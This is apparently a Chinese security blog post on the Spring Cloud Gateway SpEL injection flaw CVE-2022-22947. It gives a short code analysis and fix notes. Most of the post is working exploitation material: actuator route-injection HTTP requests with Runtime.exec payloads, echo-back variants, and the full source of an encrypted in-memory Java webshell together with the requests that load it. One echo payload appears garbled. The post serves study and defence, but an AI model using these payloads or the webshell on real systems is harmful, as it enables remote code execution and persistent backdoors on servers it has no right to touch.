这篇文章主要是参考id为zpchcbd 这个大佬的博客。以及其他大佬,详情见文末参考文章。然后结合我个人的缺失技能树的整理。主要是为了我自己学习。
审计部分不多。后面大部分都是关于漏洞利用,因为我觉得别人写的太好了。文章有点长挑自己需要/喜欢的看吧0-0
CVE-2022-22947-spring-gateway RCE
利用前提:spring-gateway开启actuator。spring版本3.1.0。3.0.0 to 3.0.6。不受支持的旧版本也会受到影响
利用过程:
-
1.添加带有Spel表达式注入的路由
-
2.refresh 路由
-
3.访问新增路由
漏洞代码:
org.springframework.cloud.gateway.support.ShortcutConfigurable
static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValue) {
Object value;
String rawValue = entryValue;
if (rawValue != null) {
rawValue = rawValue.trim();
}
if (rawValue != null && rawValue.startsWith("#{") && entryValue.endsWith("}")) {
// assume it's spel
StandardEvaluationContext context = new StandardEvaluationContext();
context.setBeanResolver(new BeanFactoryResolver(beanFactory));
Expression expression = parser.parseExpression(entryValue, new TemplateParserContext());
value = expression.getValue(context);
}
else {
value = entryValue;
}
return value;
}
漏洞产生原因主要是使用了StandardEvaluationContext,它会造成Spel表达式注入。官网github修复代码也是修改它,修改以后的是使用SimpleEvaluationContext替换它。
StandardEvaluationContext和 SimpleEvaluationContext都是执行 Spring 的 SpEL 表达式的接口,区别在于前者支持 SpEL 表达式的全部特性,后者相当于一个沙盒,限制了很多功能,如对 Java 类的引用等。因此通过将 StandardEvaluationContext类替换为 GatewayEvaluationContext类,可以限制执行注入的 SpEL 表达式。
StandardEvaluationContext造成的Spel注入还有其他cve:Spring Message远程命令执行
poc解析&&编写
网上流传的poc主要是关于新增路由配置请求包。
spring-gateway是一个网关处理组件,它具备强大的路由管理功能。可以使用静态路由以及动态路由进行配置。
静态路由:配置通常需要通过编写配置文件或编写自定义代码来定义路由规则,路由规则中的断言[predicates]用于匹配传入请求的条件。只有满足这些规则的请求才会被Spring Gateway进行处理和路由。如果在网关配置文件中没有明确定义相关断言条件,系统将无法自动生效。
动态路由配置:Spring Cloud Gateway也提供了两种动态路由的方式,一种是Spring Cloud DiscoveryClient原生支持、一种是基于Actuator API。这里主要讲基于actuator API
基于actuator:如
http://ip:port/actuator/gateway/routes/routes-name 来添加路由
POST /actuator/gateway/routes/hacker HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 231
{
"id": "hacker",
"predicates": [{
"name": "Path",
"args": {"_genkey_0":"#{T(java.lang.Runtime).getRuntime().exec('calc.exe')}"}
}],
"filters": [],
"uri": "https://www.uri-destination.org",
"order": 0
}
此外,Spring Cloud Gateway 还提供了许多其他类型的断言,例如 Cookie 断言、Header 断言、Method 断言等。我们可以根据需要选择合适的断言来匹配传入请求。除了断言以外filter过滤器也可以对路由进行处理也可以写入spel表达式。
以下是一些常用的断言类型:
-
Path 断言:**用于匹配请求的路径。
-
Cookie 断言:**用于匹配请求的 Cookie 值。
-
Header 断言:**用于匹配请求的 Header 值。
-
Method 断言:**用于匹配请求的方法。
-
Query 断言:**用于匹配请求的 Query 参数。
Spel表达式解析流程
-
1.创建一个 SpelExpressionParser 解析器。
-
2.定义要评估的表达式。
-
3.创建一个 StandardEvaluationContext 上下文,并通过 setVariable 方法设置变量的值。
-
4.使用 parser.parseExpression 解析表达式,然后通过 exp.getValue 方法执行表达式,并获取最终的计算结果。
// 步骤 1: 创建SpEL表达式解析器
ExpressionParser parser = new SpelExpressionParser();
// 步骤 2: 定义要评估的表达式(这里使用硬编码的示例表达式)
String expression = "#value * 2"; // 示例表达式:将变量value的值乘以2
// 步骤 3: 设置表达式上下文,包含变量的值
StandardEvaluationContext context = new StandardEvaluationContext();
context.setVariable("value", 5); // 设置名为"value"的变量值为5
// 步骤 4: 通过getValue执行表达式来获取最终结果
Expression exp = parser.parseExpression(expression);
int result = exp.getValue(context, Integer.class); // 使用上下文计算表达式的值
System.out.println("表达式计算结果:" + result);
常见的SpEL注入攻击流程
-
1.漏洞的基本条件有:使用StandardEvaluationContext,
-
2. 未对输入的SpEL进行校验
-
3. 对表达式调用了getValue()或setValue()方法。当满足上述条件时,就给了攻击者可乘之机。
CVE-2022-22947利用方式
1.无回显
直接写SpeL表达式
POST /actuator/gateway/routes/123456 HTTP/1.1
Host: 127.0.0.1:8081
Content-Type: application/json
{
"id": "123456",
"filters": [{
"name": "Retry",
"args": {
"a":"#{T(java.lang.Runtime).getRuntime().exec('open -a Calculator.app')}"
}
}],
"uri": "http://localhost"
}
/actuator/gateway/refresh 刷新路由缓存 就会弹计算器了
2.有回显
-
2.1 gatewayfilter-factories中存在一个AddResponseHeader
{
"id": "pentest",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "X-Request-Foo",
"": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(getRuntime().exec(new String[]{"wh"}).getInputStream()))}"
},
"uri": "http://httpbin.org/get",
"predicates": [
{
"name": "Method",
"args": {
"_key_0": "GET"
}
},
{
"name": "Path",
"args": {
"_key_0": "/pentest"
}
}
]
}
]
}
-
2.2 cookie断言也是可以有回显
{
"id": "123456",
"predicates": [{
"name": "Cookie",
"args": {
"name": "payload",
"regexp": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
}
}],
"filters": [],
"uri": "https://www.uri-destination.org",
"order": 0
}
-
2.3.写马
结合nacos一起利用,nacos里一般存在各种配置如网关配置。因为nacos存在配置动态刷新的特性,所以这边会自动refresh接口刷新,这边直接进行连接即可,所以直接添加路由即可。
1.先添加内存马
内存马
import org.springframework.http.HttpRequest;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.reactive.result.method.RequestMappingInfo;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;
public class GoldenToken {
public static Map<String, Object> store = new HashMap<>();
public static String pass = "pass", md5, xc = "3c6e0b8a9c15224a";
public static String run(Object obj, String path) {
String msg;
try {
md5 = md5(pass + xc);
Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);
registerHandlerMethod.setAccessible(true);
Method executeCommand = GoldenToken.class.getDeclaredMethod("shell", ServerWebExchange.class);
RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build();
registerHandlerMethod.invoke(obj, new GoldenToken(), executeCommand, requestMappingInfo);
msg = "ok";
} catch (Exception e) {
e.printStackTrace();
msg = "error";
}
return msg;
}
private static Class defineClass(byte[] classbytes) throws Exception {
URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
method.setAccessible(true);
return (Class) method.invoke(urlClassLoader, classbytes, 0, classbytes.length);
}
public byte[] x(byte[] s, boolean m) {
try {
javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));
return c.doFinal(s);
} catch (Exception e) {
return null;
}
}
public static String md5(String s) {
String ret = null;
try {
java.security.MessageDigest m;
m = java.security.MessageDigest.getInstance("MD5");
m.update(s.getBytes(), 0, s.length());
ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
} catch (Exception e) {
}
return ret;
}
public static String base64Encode(byte[] bs) throws Exception {
Class base64;
String value = null;
try {
base64 = Class.forName("java.util.Base64");
Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});
} catch (Exception e) {
try {
base64 = Class.forName("sun.misc.BASE64Encoder");
Object Encoder = base64.newInstance();
value = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});
} catch (Exception e2) {
}
}
return value;
}
public static byte[] base64Decode(String bs) throws Exception {
Class base64;
byte[] value = null;
try {
base64 = Class.forName("java.util.Base64");
Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
} catch (Exception e) {
try {
base64 = Class.forName("sun.misc.BASE64Decoder");
Object decoder = base64.newInstance();
value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
} catch (Exception e2) {
}
}
return value;
}
public synchronized ResponseEntity shell(ServerWebExchange pdata) {
try {
Object bufferStream = pdata.getFormData().flatMap(c -> {
StringBuilder result = new StringBuilder();
try {
String id = c.getFirst(pass);
byte[] data = x(base64Decode(id), false);
if (store.get("payload") == null) {
store.put("payload", defineClass(data));
} else {
store.put("parameters", data);
java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();
Object f = ((Class) store.get("payload")).newInstance();
f.equals(arrOut);
f.equals(data);
result.append(md5.substring(0, 16));
f.toString();
result.append(base64Encode(x(arrOut.toByteArray(), true)));
result.append(md5.substring(16));
}
} catch (Exception ex) {
result.append(ex.getMessage());
}
return Mono.just(result.toString());
});
return new ResponseEntity(bufferStream, HttpStatus.OK);
} catch (Exception ex) {
return new ResponseEntity(ex.getMessage(), HttpStatus.OK);
}
}
}
POST /actuator/gateway/routes/goldentoken HTTP/1.1
Host: 127.0.0.1:8081
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
Content-Type: application/json
Content-Length: 4065
{
"id": "GoldenToken",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GoldenToken',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAAD....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).run(@requestMappingHandlerMapping,'/favicon.ico')}"
}
}],
"uri": "http://www.baidu.com"
}
下面payload为内存马
- id: GoldenToken
order: 0
uri: lb://service-provider
predicates:
- Path=/echo/**
filters:
- name: AddResponseHeader
args:
name: result
value: "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GoldenToken',T(org.springframework.util.Base64Utils).decodeFromString('yv66vxxxxx'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).run(@requestMappingHandlerMapping,'/favicon.ico')}"
修复
除了使用新修复版本以外
禁用 actuator gateway.通过修改配置文件application.properties中的值
#以下为开启时默认值
management.endpoint.gateway.enabled=true # default value
management.endpoints.web.exposure.include=gateway
引用参考:
https://www.cnblogs.com/zpchcbd/p/17659322.html
https://bbs.huaweicloud.com/blogs/335870
http://wjlshare.com/archives/1748
原文始发于微信公众号(天才少女Alpha):CVE-2022-22947-spring-gateway RCE
